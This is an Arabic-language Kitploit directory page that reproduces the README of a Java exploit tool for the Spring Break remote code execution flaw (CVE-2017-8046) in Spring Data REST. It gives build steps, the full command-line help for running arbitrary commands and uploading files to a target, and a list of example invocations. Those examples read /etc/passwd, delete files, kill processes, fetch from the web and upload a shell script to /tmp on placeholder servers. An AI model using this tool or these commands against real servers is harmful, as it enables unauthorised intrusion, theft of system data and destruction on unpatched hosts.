Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
spring-break_cve-2017-8046 — هذا برنامج Java يستغل ثغرة Spring Break (CVE-2017-8046). | Kitploit
أدوات/GitHubGitHub/m3ssap0/spring-break_cve-2017-8046
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubm3ssap0/spring-break_cve-2017-8046

spring-break_cve-2017-8046

هذا برنامج Java يستغل ثغرة Spring Break (CVE-2017-8046).

عرض المستودع
17118منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

spring-break_cve-2017-8046

هذا برنامج بلغة Java يستغل ثغرة Spring Break (CVE-2017-8046).

تمت كتابة هذا البرنامج ليكون بأقل اعتماديات خارجية قدر الإمكان.

إخلاء مسؤولية

هذه الأداة مخصصة لمهندسي الأمن وأفراد أمن التطبيقات لأغراض التقييم الأمني. يُرجى استخدام هذه الأداة بمسؤولية. أنا لا أتحمل أي مسؤولية عن الطريقة التي يستخدم بها أي شخص هذا التطبيق. أنا لست مسؤولاً عن أي أضرار ناتجة أو أي جرائم تُرتكب باستخدام هذه الأداة.

معلومات الثغرة

  • CVE-ID: CVE-2017-8046
  • الرابط: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046
  • الوصف: يمكن لطلبات PATCH الخبيثة المقدمة إلى خوادم spring-data-rest في Pivotal Spring Data REST الإصدارات الأقدم من 2.5.12، و2.6.7، و3.0 RC3، وSpring Boot الإصدارات الأقدم من 2.0.0M4، وقطارات إصدار Spring Data الأقدم من Kay-RC3 استخدام بيانات JSON مُعدّة خصيصًا لتنفيذ كود Java تعسفي.
  • رابط البائع: https://pivotal.io/security/cve-2017-8046

كيفية إنشاء ملف JAR قابل للتنفيذ

فيما يلي بعض الخطوات التي يجب اتباعها لإنشاء ملف JAR قابل للتنفيذ، مع جميع التبعيات داخله، والذي يمكن استخدامه لتشغيل الاستغلال.

باستخدام Maven

يمكن تشغيل أمر Maven التالي:

mvn clean compile package

باستخدام Eclipse

يمكن اتباع الخطوات التالية:

  1. حل جميع التبعيات/المكتبات الخارجية؛
  2. انقر بزر الماوس الأيمن على مشروع Eclipse وانتقل إلى Run As > Run Configurations؛
  3. انقر بزر الماوس الأيمن على Java Application ثم على New؛
  4. اختر اسمًا واضبط الفئة الرئيسية على com.afs.exploit.spring.SpringBreakCve20178046؛
  5. انقر على زر Apply؛
  6. أغلق النافذة وعد إلى نافذة Eclipse الرئيسية؛
  7. انقر بزر الماوس الأيمن على مشروع Eclipse وانقر على Export...؛
  8. ابحث واختر Runnable JAR file (تحت فرع Java)؛
  9. في النافذة التالية:
    1. اختر Launch configuration الصحيح الذي تم إنشاؤه مسبقًا؛
    2. اختر Export destination؛
    3. اختر الخيار Extract required libraries into generated JAR؛
    4. انقر على زر Finish.

المساعدة

Usage:
   java -jar spring-break_cve-2017-8046.jar [options]
Description:
   Exploiting 'Spring Break' Remote Code Execution (CVE-2017-8046).
Options:
   -h, --help
      Prints this help and exits.
   -u, --url [target_URL]
      The target URL where the exploit will be performed.
      You have to choose an existent resource.
   -cmd, --command [command_to_execute]
      The command that will be executed on the remote machine.
   -U, --upload [file_to_upload]
      File to upload to the remote machine. Will be uploaded to the current working
      directory of the java process. Warning: this will only succeed on a server running
      JRE-1.7 or later.
   --remote-upload-directory [/some/existing/path/]
      Optional. Server will attempt to write the uploaded file to this directory on the
      filesystem. Specified directory must exist and be writeable.
   --cookies [cookies]
      Optional. Cookies passed into the request, e.g. authentication cookies.
   -H, --header [custom_header]
      Optional. Custom header passed into the request, e.g. authorization header.
   -k
      Skip SSL validation
   --clean
      Optional. Removes error messages in output due to the usage of the
      exploit. It could hide error messages if the request fails for other reasons.
   --error-stream
      Optional. In case of errors the command will fail and the error stream will
      not be returned. This option can be used to relaunch the remote command
      returning the error stream.
   -v, --verbose
      Optional. Increase verbosity.

أمثلة

java -jar spring-break_cve-2017-8046.jar --url "https://vuln01.foo.com/api/v1/entity/123" --command ipconfig
java -jar spring-break_cve-2017-8046.jar --url "https://vuln02.foo.com/api/v2/entity/42" --command ipconfig --cookies "JSESSIONID=qwerty0123456789"
java -jar spring-break_cve-2017-8046.jar -v --url "https://vuln02.foo.com/api/v2/entity/42" --upload file.sh --remote-upload-directory /tmp
java -jar spring-break_cve-2017-8046.jar --url "https://vuln03.foo.com/asd/api/v1/entity/1" --command dir --cookies "JSESSIONID=qwerty0123456789;foo=bar"
java -jar spring-break_cve-2017-8046.jar --url "https://vuln04.foo.com/asd/api/v1/entity/1" --command "dir C:\Windows" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln05.foo.com/asd/api/v1/entity/1" --command "copy /b NUL ..\..\pwned.txt" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln06.foo.com/asd/api/v1/entity/1" --command "ping -c 3 www.google.it" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln07.foo.com/asd/api/v1/entity/1" --command "ps aux" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln08.foo.com/asd/api/v1/entity/1" --command "uname -a" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln09.foo.com/asd/api/v1/entity/1" --command "ls -l" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln10.foo.com/asd/api/v1/entity/1" --command "wget https://www.google.com" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln11.foo.com/asd/api/v1/entity/1" --command "rm index.html" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln12.foo.com/asd/api/v1/entity/1" --command "cat /etc/passwd" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln13.foo.com/asd/api/v1/entity/1" --command "kill -9 5638" --clean

يرجى ملاحظة أن المورد/الرابط المشار إليه يجب أن يكون موجودًا!

تطبيق ضعيف

يمكن العثور على تطبيق ضعيف هنا.

المؤلفون

  • Antonio Francesco Sardella - التنفيذ الرئيسي - m3ssap0
  • Yassine Tioual - تحسين رؤوس HTTP - nisay759
  • Robin Wagenaar - للاقتراح باستخدام عملية التصحيح 'remove' بدلاً من 'replace' ووظيفة رفع الملفات - RobinWagenaar

الترخيص

هذا المشروع مرخص بموجب ترخيص Apache الإصدار 2.0 - راجع ملف LICENSE.txt للحصول على التفاصيل.

الإقرارات

  • Man Yue Mo الباحث الأمني الذي اكتشف الثغرة
تنزيل الأداة